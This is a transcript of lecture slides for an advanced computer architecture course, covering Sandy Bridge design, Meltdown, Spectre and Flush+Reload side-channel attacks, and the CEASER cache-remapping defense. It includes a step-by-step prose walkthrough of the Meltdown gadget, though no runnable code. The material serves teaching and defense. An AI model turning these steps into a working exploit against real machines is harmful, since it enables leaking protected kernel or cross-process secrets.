Introduction to Advanced Computer Architecture with CUDA Programming
Delve into cutting-edge topics like Intel Sandy Bridge architecture, micro-architecture understanding, and modern security attacks. Explore the core concepts of processor design, out-of-order execution, and memory access units to enhance your knowledge in computer architecture.
Download Presentation

Please find below an Image/Link to download the presentation.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.
You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.
E N D
Presentation Transcript
Advanced Computer Architecture Introduction to CUDA Programming Andreas Moshovos Winter 2019 Introduction
Goals for Today Should you take the course? What should you know What is expected of you What you will get out of it
Should you take the course What should you know? I ll let you decide on your own To help you: Overview modern processor design Through reviewing modern security attacks And to make it worthwhile for everyone Through reviewing a recent excellent work on mitigating them
Material for today Intel Sandy Bridge overview Older design but Intel is using the same microarchitecture with minor tweaks as far as our discussion is concerned Meltdown and Spectre attacks Got to really understand micro-architecture to get it Moin Qureshi s: CEASER: Mitigating Conflict- Based Cache Attacks via Encrypted- Address and Remapping. MICRO 2018: 775- 787, best paper award
Chip Architecture 32nm
Memory Access Units L1 load to use latency is 4 cycles Banked to support multiple accesses Poor man s multiporting? L2 load to use latency is 12 cycles
L3 and ring interconnect CPUs, GPU and system agent Communicate via a ring Each CPU has an 2MB 8-way SA L3 slice Static hash of addresses to slices Latency varies: which core to which slice 26-31 cycles Max bandwidth: 435.2GB/s at 3.4Ghz
Isolation User vs. kernel space isolation Privilege bit Kernel space mapped onto user space
Overview of attack Exploit speculative execution To temporarily load protected data into a register Use value to cause micro-architectural state change which persists
Flush+Reload Clflush instruction Flush any cache line that contains a specific address Works for shared addresses Think code that is shared among two processes Paper shows how to use that to read the secret key by detecting the order in which code functions are called
Exception E.g., divide by zero or access illegal address Suppression vs. Handling Handling: fork prior to exception Suppression: Use Transactional Memory handling Branch prediction exploitation (Spectre)
Example Line 4: attempt to read the secret address [rcx] into register al this will raise a protection exception but the CPU will still do it as part of speculative execution the exception will be handled when the mov tries to RETIRE (Commit) SHL by 12 multiplies the AL values by 4K the page size The mov RBX will try to read a page at a distance based on the AL value. This is a race, may or may not happen. Step 2: the attacker times accesses to all 256 pages.
Goal LLC is shared LLC contains micro-architectural state Using side-channel attacks a process can read values from another process through this side- channel TO do so the attacker needs to know how addresses are mapped onto the LLC CEASER: per process mapping which changes frequently
CEASER: Mitigating Conflict-Based Attacks via Encrypted-Address and Remapping MICRO-2018 Moinuddin Qureshi
Background: Resource Sharing Modern systems share LLC for improving resource utilization B LLC CORE CORE Sharing the LLC allows system to dynamically allocate LLC capacity
Conflict-Based Cache Attacks Co-running spy can infer access pattern of victim by causing cache conflicts B B V A Miss for B Victim Accessed Set LLC CORE (Spy) CORE (Victim) Conflicts leak access pattern, used to infer secret [AES Bernstein 05]
Prior Solutions Table-Based Randomization Way Partitioning NoMo [TACO 12], CATalyst [HPCA 16] RPCache[ISCA 07], NewCache[MICRO 08] Mapping Table (MT) Mapping Table large for LLC (MBs) Inefficient use of cache space OS support needed to protect Table Not scalable to many core
Our Goal Protect the LLC from conflict-based attacks, while incurring 1. Negligible storage overhead 1. Negligible performance overhead 1. No OS support 1. No restriction on capacity sharing 1. Localized Implementation
Outline Why? CEASE CEASER Effective?
CEASE: Cache using Encrypted Address Space Insight: Don t memorize the random mapping, compute it Key Key Decryp t xCAFE0000 Encrypt Physical Line Address (PLA) Dirty Evict ELA 0xa17b20cf (ELA) LLC CEASE Localized change (ELA visible only within the cache) Cache operations (access, coherence, prefetch) all remain unchanged
Randomization via Encryption Lines that mapped to the same set, get scattered to different sets Key Key A B A B A Encrypt Encrypt B LLC LLC LLC CEASE CEASE Mapping depends on the key, different machines have different keys
Encryption: Need Fast, Small-Width Cipher B B Block Cipher PlainText CipherText PLA is ~40 bits (up-to 64TB memory) Larger tag (80+ bits) Small-width Ciphers deemed insecure: Brute-force attack on key Memorize all input-output pairs Latency of 10+ cycles Insight: ELA not visible to attacker (okay to use 40-bit block cipher)
Low-Latency Block Cipher (LLBC) Four-Stage Feistel-Network (with Substitution-Permutation Network) *inspired by DES and BlowFish Encryption LLBC incurs a delay of 24 XOR gates (approximately 2-cycle latency)
Outline Why? CEASE CEASER Effective?
Lets Break CEASE [Liu et al. S&P, 2015] Form pattern such that cache has a conflict miss D Remove one line from pattern & check conflict B C A E LLC Yes No Conflic t Miss? Removed line MAPS to conflicting set Removed line NOT in conflicting set Attacker can break CEASE within 22 seconds (8MB LLC)
CEASER: CEASE with Remapping Split time into Epoch of N accesses (change Key every Epoch) Key Key Key CACHE BULK EPOC H time CurrKey CurrKey CurrKey NextKey NextKey NextKey GRADUAL CEASER uses gradual remapping to periodically change the keys
CEASER: CEASE with Remapping Remap-Rate of 1 % Remap W-way set after (100*W) accesses X1 A1 A0 B0 SetPt r CurrKey CurrKey NextKey NextKey B1 X0 Access=0 Epoch=0 Epoch=0 Epoch=0 Epoch=0 Epoch=0 Epoch=1 Access=200 Access=400 Access=600 Access=800 Access=0 Y1 Y0 Z0 Z1 Cache Access: If (Set[CurrKey] < Sptr) Use NextKey CEASER with gradual remap needs negligible hardware (one bit per line)
Outline Why? CEASE CEASER Effective?
Security Analysis Time to learn Eviction Set for one set (vulnerability removed after remap, <1ms) Remap-Rate 8MB LLC 1 MB LLC-Bank 1% (default) 0.5% 100+ years 100+ years 100+ years 21 years 0.1% 100+ years 5 hours 0.05% 37 years 5 minutes No-Remap (CEASE) 22 0.4 seconds Limits impact on missrate, seconds energy, accesses to ~1% CEASER can tolerate years of attack (Even with remap-rate of 1%)
Performance and Storage Overheads 8 cores with 8MB LLC 16-way (34 workloads, SPEC + Graph) CEASE Norm Performance (%) 100 Structures Cost 99 80-bit key (2 LLBC) 20 bytes 98 SPtr 2 bytes 97 Access Counter 2 bytes 96 Total 24 bytes 95 Rate-34 Mix-100 ALL-134 CEASER incurs negligible slowdown (~1% ) and storage overheads (24 bytes)
Summary Need practical solution to protect LLC from conflict-based attacks Robust to attacks (years) Key1 Key2 Negligible slowdown (~ 1%) Encrypt Line Address Negligible storage (24 bytes) Localized change (within cache) Cache No OS support needed Change Key, Periodically Appealing for Industrial Adoption
On average we will meet once per week I will be traveling at times and I will be making up for the time lost by holding two lectures for some weeks What I expect you to do Reading assignments per week Questionnaires to be handed in at the beginning of class Homeworks Programming assignments Project Validate some prior work Do something new Maybe present papers (we will see)